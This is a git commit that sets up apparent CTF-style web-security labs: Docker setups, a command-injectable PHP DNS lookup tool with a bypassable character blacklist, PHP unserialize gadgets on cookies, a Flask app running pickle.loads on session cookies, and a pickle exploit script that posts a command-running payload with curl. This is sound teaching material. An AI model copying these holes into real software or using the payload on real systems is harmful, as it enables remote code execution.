初次 commit。

splitline · Nov 9, 2021 · 8fe2fea · 8fe2fea
commit 8fe2fea
Show file tree

Hide file tree

Showing 93 changed files with 1,526 additions and 0 deletions.
diff --git a/homework/README.md b/homework/README.md
@@ -0,0 +1 @@
+TBA
diff --git a/lab/cmd-injection/dnstool-waf/Dockerfile b/lab/cmd-injection/dnstool-waf/Dockerfile
@@ -0,0 +1,5 @@
+FROM php:7.4-apache
+
+RUN apt update
+RUN apt install dnsutils -qy
+RUN mv "$PHP_INI_DIR/php.ini-production" "$PHP_INI_DIR/php.ini"
diff --git a/lab/cmd-injection/dnstool-waf/flag b/lab/cmd-injection/dnstool-waf/flag
@@ -0,0 +1 @@
+FLAG{lab_flag}
diff --git a/lab/cmd-injection/dnstool-waf/src/index.php b/lab/cmd-injection/dnstool-waf/src/index.php
@@ -0,0 +1,59 @@
+<?php
+isset($_GET['source']) and die(show_source(__FILE__, true));
+?>
+
+<!DOCTYPE html>
+<html lang="en">
+
+<head>
+    <meta charset="UTF-8">
+    <meta http-equiv="X-UA-Compatible" content="IE=edge">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>DNS Lookup Tool | WAF</title>
+    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.9.3/css/bulma.min.css">
+</head>
+
+<body>
+    <section class="section">
+        <div class="container">
+            <div class="column is-6 is-offset-3 has-text-centered">
+                <div class="box">
+                    <h1 class="title">DNS Lookup Tool 🔍 | WAF Edition</h1>
+                    <form method="POST">
+                        <div class="field">
+                            <div class="control">
+                                <input class="input" type="text" name="name" placeholder="example.com" id="hostname" value="<?= $_POST['name'] ?? '' ?>">
+                            </div>
+                        </div>
+                        <button class="button is-block is-info is-fullwidth">
+                            Lookup!
+                        </button>
+                    </form>
+                    <br>
+                    <?php if (isset($_POST['name'])) : ?>
+                        <section class="has-text-left">
+                            <p>Lookup result:</p>
+                            <pre>
+                            <?php
+                            $blacklist = ['|', '&', ';', '>', '<', "\n", 'flag'];
+                            $is_input_safe = true;
+                            foreach ($blacklist as $bad_word)
+                                if (strstr($_POST['name'], $bad_word) !== false) $is_input_safe = false;
+
+                            if ($is_input_safe)
+                                system("host '" . $_POST['name'] . "';");
+                            else
+                                echo "HACKER!!!";
+                            ?>
+                            </pre>
+                        </section>
+                    <?php endif; ?>
+                    <hr>
+                    <a href="/?source">Source Code</a>
+                </div>
+            </div>
+        </div>
+    </section>
+</body>
+
+</html>
diff --git a/lab/cmd-injection/dnstool/Dockerfile b/lab/cmd-injection/dnstool/Dockerfile
@@ -0,0 +1,5 @@
+FROM php:7.4-apache
+
+RUN apt update
+RUN apt install dnsutils -qy
+RUN mv "$PHP_INI_DIR/php.ini-production" "$PHP_INI_DIR/php.ini"
diff --git a/lab/cmd-injection/dnstool/flag b/lab/cmd-injection/dnstool/flag
@@ -0,0 +1 @@
+FLAG{lab_flag}
diff --git a/lab/cmd-injection/dnstool/src/index.php b/lab/cmd-injection/dnstool/src/index.php
@@ -0,0 +1,57 @@
+<?php
+isset($_GET['source']) and die(show_source(__FILE__, true));
+?>
+
+<!DOCTYPE html>
+<html lang="en">
+
+<head>
+    <meta charset="UTF-8">
+    <meta http-equiv="X-UA-Compatible" content="IE=edge">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>DNS Lookup Tool | Baby</title>
+    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.9.3/css/bulma.min.css">
+</head>
+
+<body>
+    <section class="section">
+        <div class="container">
+            <div class="column is-6 is-offset-3 has-text-centered">
+                <div class="box">
+                    <h1 class="title">DNS Lookup Tool 🔍</h1>
+                    <form method="POST">
+                        <div class="field">
+                            <div class="control">
+                                <input class="input" type="text" name="name" placeholder="example.com" id="hostname" value="<?= $_POST['name'] ?? '' ?>">
+                            </div>
+                        </div>
+                        <button class="button is-block is-info is-fullwidth">
+                            Lookup!
+                        </button>
+                    </form>
+                    <br>
+                    <?php if (isset($_POST['name'])) : ?>
+                        <section class="has-text-left">
+                            <p>Lookup result:</p>
+                            <pre><?= shell_exec("host '" . $_POST['name'] . "';") ?></pre>
+                        </section>
+                    <?php endif; ?>
+                    <hr>
+                    <a id="magic">Magic</a> | <a href="/?source">Source Code</a>
+                </div>
+                <article class="message is-link is-hidden is-size-4" id="hint">
+                    <div class="message-body is-family-monospace">
+                        host '<span class="has-text-danger" id="command"></span>';
+                    </div>
+                </article>
+            </div>
+        </div>
+    </section>
+
+    <script>
+        magic.onclick = () => hint.classList.toggle("is-hidden");
+        window.onload = hostname.oninput = () => command.textContent = hostname.value;
+    </script>
+</body>
+
+</html>
diff --git a/lab/cmd-injection/docker-compose.yml b/lab/cmd-injection/docker-compose.yml
@@ -0,0 +1,18 @@
+version: '3'
+
+services:
+  dnstool:
+    build: ./dnstool
+    volumes:
+      - ./dnstool/src/:/var/www/html/
+      - ./dnstool/flag:/flag_44ebd3936a907d59:ro
+    ports:
+      - 8300:80/tcp
+
+  dnstool-waf:
+    build: ./dnstool-waf
+    volumes:
+      - ./dnstool-waf/src/:/var/www/html/
+      - ./dnstool-waf/flag:/flag_f4b9830a65d9e956:ro
+    ports:
+      - 8301:80/tcp
diff --git a/lab/deserialization/_flags/cat b/lab/deserialization/_flags/cat
@@ -0,0 +1 @@
+FLAG{lab_flag}
diff --git a/lab/deserialization/_flags/magic-cat b/lab/deserialization/_flags/magic-cat
@@ -0,0 +1 @@
+FLAG{lab_flag}
diff --git a/lab/deserialization/_flags/pickle b/lab/deserialization/_flags/pickle
@@ -0,0 +1 @@
+FLAG{lab_flag}
diff --git a/lab/deserialization/cat/Dockerfile b/lab/deserialization/cat/Dockerfile
@@ -0,0 +1,6 @@
+FROM php:7.4-apache
+
+RUN apt update
+RUN apt install cowsay -qy
+RUN cp /usr/games/cowsay /usr/local/bin/cowsay
+# RUN mv "$PHP_INI_DIR/php.ini-production" "$PHP_INI_DIR/php.ini"
diff --git a/lab/deserialization/cat/index.php b/lab/deserialization/cat/index.php
@@ -0,0 +1,27 @@
+<?php
+isset($_GET['source']) && die(!show_source(__FILE__));
+
+class Cat
+{
+    public $name = '(guest cat)';
+    function __construct($name)
+    {
+        $this->name = $name;
+    }
+    function __wakeup()
+    {
+        echo "<pre>";
+        system("cowsay 'Welcome back, $this->name'");
+        echo "</pre>";
+    }
+}
+
+if (!isset($_COOKIE['cat_session'])) {
+    $cat = new Cat("cat_" . rand(0, 0xffff));
+    setcookie('cat_session', base64_encode(serialize($cat)));
+} else {
+    $cat = unserialize(base64_decode($_COOKIE['cat_session']));
+}
+?>
+<p>Hello, <?= $cat->name ?>.</p>
+<a href="/?source">source code</a>
diff --git a/lab/deserialization/docker-compose.yml b/lab/deserialization/docker-compose.yml
@@ -0,0 +1,24 @@
+version: "3.5"
+
+services:
+    pickle:
+        image: tiangolo/uwsgi-nginx-flask:python3.8
+        volumes:
+            - ./pickle/:/app
+            - ./_flags/pickle:/flag_5fb2acebf1d0c558
+        ports:
+            - 8600:80/tcp
+    cat:
+        build: ./cat
+        volumes:
+            - ./cat/:/var/www/html/
+            - ./_flags/cat:/flag_5fb2acebf1d0c558
+        ports:
+            - 8601:80/tcp
+    magic-cat:
+        image: php:7.4-apache
+        volumes:
+            - ./magic-cat/:/var/www/html/
+            - ./_flags/magic-cat:/flag_23907376917516c8
+        ports:
+            - 8602:80/tcp
diff --git a/lab/deserialization/magic-cat/Dockerfile b/lab/deserialization/magic-cat/Dockerfile
@@ -0,0 +1,6 @@
+FROM php:7.4-apache
+
+RUN apt update
+RUN apt install cowsay -qy
+RUN cp /usr/games/cowsay /usr/local/bin/cowsay
+# RUN mv "$PHP_INI_DIR/php.ini-production" "$PHP_INI_DIR/php.ini"
diff --git a/lab/deserialization/magic-cat/index.php b/lab/deserialization/magic-cat/index.php
@@ -0,0 +1,56 @@
+<?php
+isset($_GET['source']) && die(!show_source(__FILE__));
+
+class Magic
+{
+    function cast($spell)
+    {
+        echo "<script>alert('MAGIC, $spell!');</script>";
+    }
+}
+
+// Useless class?
+class Caster
+{
+    public $cast_func = 'intval';
+    function cast($val)
+    {
+        return ($this->cast_func)($val);
+    }
+}
+
+
+class Cat
+{
+    public $magic;
+    public $spell;
+    function __construct($spell)
+    {
+        $this->magic = new Magic();
+        $this->spell = $spell;
+    }
+    function __wakeup()
+    {
+        echo "Cat Wakeup!\n";
+        $this->magic->cast($this->spell);
+    }
+}
+
+if (isset($_GET['spell'])) {
+    $cat = new Cat($_GET['spell']);
+} else if (isset($_COOKIE['cat'])) {
+    echo "Unserialize...\n";
+    $cat = unserialize(base64_decode($_COOKIE['cat']));
+} else {
+    $cat = new Cat("meow-meow-magic");
+}
+?>
+<pre>
+This is your 🐱:
+<?php var_dump($cat) ?>
+</pre>
+
+<p>Usage:</p>
+<p>/?source</p>
+<p>/?spell=the-spell-of-your-cat</p>
+
diff --git a/lab/deserialization/pickle/exploit.py b/lab/deserialization/pickle/exploit.py
@@ -0,0 +1,14 @@
+import pickle
+import base64
+import os
+
+command = 'id'
+
+
+class Exp:
+    def __reduce__(self):
+        return (__import__('subprocess').getoutput, (command,))
+
+
+cookie = base64.b64encode(pickle.dumps({"age": 1, "name": Exp()})).decode()
+os.system(f"curl http://h4ck3r.quest:8400/ --cookie 'session={cookie}'")
diff --git a/lab/deserialization/pickle/main.py b/lab/deserialization/pickle/main.py
@@ -0,0 +1,35 @@
+from flask import Flask, request, make_response, redirect, send_file
+import base64
+import pickle
+
+app = Flask(__name__)
+
+
+@app.route("/sauce")
+def sauce():
+    return send_file(__file__, mimetype="text/plain")
+
+
+@app.route("/")
+def main():
+    session = request.cookies.get("session")
+    if session == None:
+        return '<form action="/login" method="POST">' +\
+            '<p>Name: <input name="name" type="text"></p>' +\
+            '<p>Age: <input name="age" type="number"></p>' +\
+            '<button>Submit</button></form><hr><a href="/sauce">Source code</a>'
+
+    else:
+        user = pickle.loads(base64.b64decode(session))
+        return f'<p>Name: {user["name"]}</p><p>Age: {user["age"]}</p>'
+
+
+@app.route("/login", methods=['POST'])
+def login():
+    user = base64.b64encode(pickle.dumps({
+        "name": request.form.get('name'),
+        "age": int(request.form.get('age'))
+    }))
+    resp = make_response(redirect('/'))
+    resp.set_cookie("session", user)
+    return resp
diff --git a/lab/deserialization/pickle/uwsgi.ini b/lab/deserialization/pickle/uwsgi.ini
@@ -0,0 +1,5 @@
+[uwsgi]
+module = main
+callable = app
+uid = 1001
+gid = 1001
diff --git a/lab/frontend/xss/app/Dockerfile b/lab/frontend/xss/app/Dockerfile
@@ -0,0 +1,2 @@
+FROM tiangolo/uwsgi-nginx-flask:python3.8
+RUN pip3 install redis rq
Original file line number	Diff line number	Diff line change
		@@ -0,0 +1,2 @@
		FROM tiangolo/uwsgi-nginx-flask:python3.8
		RUN pip3 install redis rq